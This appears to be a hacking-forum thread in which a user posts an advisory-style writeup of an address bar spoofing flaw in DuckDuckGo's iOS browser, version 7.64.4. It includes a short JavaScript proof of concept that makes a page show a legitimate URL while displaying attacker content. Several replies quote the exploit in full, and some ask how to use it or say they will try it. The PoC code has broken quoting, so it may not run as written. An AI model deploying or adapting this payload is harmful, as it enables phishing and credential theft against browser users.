DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Banlı Üye
Katılım
2 Ara 2021
Mesajlar
28
Tepki puanı
16
Yaş
23
4 HİZMET YILI
Kod:
#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.
 
Ultra Üye
Katılım
27 Ocak 2020
Mesajlar
1,994
Çözümler
139
Tepki puanı
531
Ödüller
10
6 HİZMET YILI
i didn't understand what i correctly does could you explain to me
 
Süper Üye
Katılım
28 Mar 2020
Mesajlar
609
Çözümler
2
Tepki puanı
61
Ödüller
4
Yaş
26
6 HİZMET YILI
whats wrong with that ?
 
Shinigami
Süper Üye
Katılım
9 Eyl 2020
Mesajlar
603
Çözümler
2
Tepki puanı
79
Ödüller
6
Yaş
27
5 HİZMET YILI
Thanks for sharing man! DuckDuckGo been around for forever it feels like didnt see this around
 
Why so Serious
Seçkin Üye
Katılım
27 Kas 2021
Mesajlar
477
Çözümler
2
Tepki puanı
59
Ödüller
3
4 HİZMET YILI
Kod:
#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.
tall me plz how to use this.
 
Süper Üye
Katılım
17 Kas 2018
Mesajlar
864
Çözümler
10
Tepki puanı
159
Ödüller
6
Yaş
28
7 HİZMET YILI
Kod:
#Vulnerability: Address Bar Spoofing Vulnerability
Product: DuckDuckGo
#Version: 7.64.4
#Impact: Moderate
 
 
*Description*
 
DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"
vulnerability due to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.
 
 
 
*Proof of Concept (POC)*
 
Following is the POC that could be used to reproduce the issue:
 
<script>
    function spoof(){
    location="https://www.google.com/csi?random="+Math.random();
    document.body.innerHTML='This is not Google!';("This is not google.com
</h1>");}
</script>
<input type="button" value="Run"
onclick="setInterval("spoof()",20);"/>
 
 
 
*Impact*
 
The issue could be abused to carry out more effective phishing attacks
against it's users.
Is this the latest one? Thanks for sharing
 
𝕄𝕒𝕤𝕥𝕖𝕣 𝕠𝕗 𝕎𝕒𝕥𝕔𝕙
Ultra Üye
Katılım
20 May 2020
Mesajlar
1,954
Tepki puanı
261
Ödüller
9
6 HİZMET YILI
wow thx for this one
 
Bad Boy
Seçkin Üye
Katılım
16 Haz 2020
Mesajlar
466
Çözümler
2
Tepki puanı
79
Ödüller
6
5 HİZMET YILI
i ll try it thx a lot hop its working
 
Süper Üye
Katılım
16 Mar 2019
Mesajlar
604
Çözümler
1
Tepki puanı
17
Ödüller
6
Yaş
27
7 HİZMET YILI
thanks for this ill make sure to test it out and give update
 
ABOBA
Seçkin Üye
Katılım
22 Mar 2022
Mesajlar
302
Çözümler
3
Tepki puanı
11
Ödüller
3
4 HİZMET YILI
thx has been looking for a long time
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst